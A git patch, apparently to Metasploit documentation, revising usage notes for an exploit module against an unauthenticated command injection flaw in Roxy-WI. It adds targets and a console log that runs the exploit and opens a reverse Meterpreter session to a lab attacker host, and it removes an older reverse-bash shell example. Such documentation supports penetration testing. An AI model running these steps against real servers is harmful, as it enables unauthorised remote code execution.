From bdf8defe53dd6bf8d618bd85aee96bf6ea702039 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Nuri=20=C3=87ilengir?= <44322086+ncilengir@users.noreply.github.com>
Date: Mon, 25 Jul 2022 16:03:09 +0000
Subject: [PATCH] Apply suggestions from code review
---
 .../exploit/linux/http/roxy_wi_exec.md | 70 +++++++------------
 1 file changed, 27 insertions(+), 43 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/roxy_wi_exec.md b/documentation/modules/exploit/linux/http/roxy_wi_exec.md
index 5bdbb6ebe1..e9078aa47c 100644
--- a/documentation/modules/exploit/linux/http/roxy_wi_exec.md
+++ b/documentation/modules/exploit/linux/http/roxy_wi_exec.md
@@ -1,11 +1,8 @@
 ## Vulnerable Application -### Description - This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. - ### Setup Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages. 
@@ -30,62 +27,49 @@ chown -R www-data:www-data haproxy-wi 9. Do: `run` 10. You should get a shell as the user running the Roxy-WI server. +## Targets + +### 0 + +This executes a Unix command. + +### 1 + +This uses a Linux dropper to execute code. + ## Options ### TARGETURI -The base path to Roxy-WI. The default value is `/` + +Set `TARGETURI` if the Roxy-WI is installed at a custom path. ## Scenarios +### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) + ``` -msf6 > use exploit/linux/http/roxy_wi_exec +Apache/2.4.52 +MySQL 8.0.29 +Python 3.10.4 +``` + +``` +msf6 > use exploit/linux/http/roxy_wi_exec [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116 RHOST => 192.168.56.116 -msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 -RPORT => 443 msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 +msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 +RPORT => 443 msf6 exploit(linux/http/roxy_wi_exec) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Checking if 192.168.56.116:443 is vulnerable! [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed. -[*] Generating payload. -[*] Trying to detect command injection vulnerability. -[*] Sending stage (40164 bytes) to 192.168.56.116 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300 -[+] Exploit successfully executed. +[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp +[*] Sending stage (40168 bytes) to 192.168.56.116 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300 -meterpreter > pwd -/var/www/haproxy-wi/app -``` - -You can also use cmd payloads. 
-
-```
-msf6 > use exploit/linux/http/roxy_wi_exec
-[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
-RHOST => 192.168.56.116
-msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
-RPORT => 443
-msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
-LHOST => 192.168.56.1
-msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
-payload => cmd/unix/reverse_bash
-msf6 exploit(linux/http/roxy_wi_exec) > run
-
-[*] Started reverse TCP handler on 192.168.56.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if 192.168.56.116:443 is vulnerable!
-[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
-[*] Generating payload.
-[*] Trying to detect command injection vulnerability.
-[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
-[+] Exploit successfully executed.
-
-id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)```
+meterpreter > ```